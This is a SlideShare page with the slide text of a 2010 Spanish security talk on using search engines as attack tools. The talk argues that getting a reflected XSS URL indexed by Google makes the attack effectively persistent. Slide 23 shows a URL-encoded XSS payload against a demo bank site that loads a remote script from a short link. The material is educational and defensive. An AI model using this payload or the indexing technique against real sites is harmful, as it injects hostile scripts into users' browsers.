Ce diaporama a bien été signalé.
Nous utilisons votre profil LinkedIn et vos données d’activité pour vous proposer des publicités personnalisées et pertinentes. Vous pouvez changer vos préférences de publicités à tout moment.

Ataques XSS Google Persistentes

Charla impartida en el Asegur@IT Camp 2 en el año 2010 por Chema Alonso. El vídeo de la presentación está en https://www.youtube.com/watch?v=0KYnnITHLNU y la presentación está basada en el artículo de "Buscadores como armas de destrucción masivas" http://www.elladodelmal.com/2010/03/buscadores-como-arma-de-destruccion.html

  • Soyez le premier à commenter

Ataques XSS Google Persistentes

  1. 1. Ataques XSS Google Persistentes Chema Alonso
  2. 2. Buscadores como Arma Búsqueda de información Búsqueda de vulnerabilidades Distribución de malware Ejecución de comandos Ataques XSS
  3. 3. Búsqueda de información
  4. 4. Búsqueda de passwords
  5. 5. Distribución de malware en Apple.com
  6. 6. BrowserShots
  7. 7. Caché de ataques SQL
  8. 8. Servicios de PING
  9. 9. Análisis Forense
  10. 10. XSS Persistentes  Se inyectan en el repositorio de datos de la aplicación  Bases de datos  Correos Web  Tienen cierto nivel de complejidad  Tienen que ocultarse a los ojos de los administradores  Están en los datos  Pueden tener consecuencias inesperadas
  11. 11. XSS No Persistentes
  12. 12. ¿Cómo se descubren?  Pentesting  Acunetix free-edition  El blog de Eduardo Abril  Just Googling
  13. 13. FBI y sus XSS
  14. 14. NASA y XSS
  15. 15. Dominio .mil
  16. 16. Oracle
  17. 17. Google
  18. 18. «Last-minute» XSS
  19. 19. Scripts de Búsqueda
  20. 20. The Facts  Google Indexa URLs con XSS  Un alto porcentaje de usuarios llega por buscadores
  21. 21. The Facts…  Bueno… «buscadores means Google»
  22. 22. Conclusión  Se puede dar de alta una URL con un XSS no persistente  Servicio de alta de URLs  Enlazado en una web indexada  Se puede posicionar con técnicas Black SEO
  23. 23. Bank Of Maligno  Web «copia» de Bank of América  XSS No Persistente en search.aspx  URL de ataque:  http://bankofmaligno.informatica64.com/search.aspx?S= %22%68%6F%6C%61%3C%73%63%72%69%70%74% 20%66%6F%72%3D%77%69%6E%64%6F%77%20%65 %76%65%6E%74%3D%6F%6E%6C%6F%61%64%20% 73%72%63%3D%22%68%74%74%70%3A%2F%2F%62 %69%74%2E%6C%79%2F%64%63%73%65%4E%49% 22%3E%3C%2F%73%63%72%69%70%74%3E  Dada de alta en Google & Bing manualmente  Dada de alta en Blog «Un informático en el lado del mal»
  24. 24. Bank Of Maligno
  25. 25. Bank Of Maligno
  26. 26. Bank Of Maligno
  27. 27. Conclusiones  No hay filtrado de URLs  Ataques SQL Injection  Ataques XSS  Indexar un XSS en Google (u otro buscador) es convertirlo en un % Persistente  Protección SEO + Protección robots.txt
  28. 28. ¿Preguntas?  Chema Alonso  chema@informatica64.com  http://twitter.com/chemaalonso  http://www.informatica64.com  Blogs  http://www.elladodelmal.com  http://www.windowstecnico.com  http://www.seguridadapple.com  http://www.forefront-es.com  http://www.puntocompartido.com/blogshare  http://www.exchangespain.com

    Soyez le premier à commenter

    Identifiez-vous pour voir les commentaires

  • jfernandez04

    May. 19, 2014
  • ferranolivella

    May. 19, 2014
  • seguridadjabali

    May. 25, 2014
  • NachoFortea

    Apr. 9, 2015

Charla impartida en el Asegur@IT Camp 2 en el año 2010 por Chema Alonso. El vídeo de la presentación está en https://www.youtube.com/watch?v=0KYnnITHLNU y la presentación está basada en el artículo de "Buscadores como armas de destrucción masivas" http://www.elladodelmal.com/2010/03/buscadores-como-arma-de-destruccion.html

Vues

Nombre de vues

1 597

Sur Slideshare

0

À partir des intégrations

0

Nombre d'intégrations

2

Actions

Téléchargements

71

Partages

0

Commentaires

0

Mentions J'aime

4

×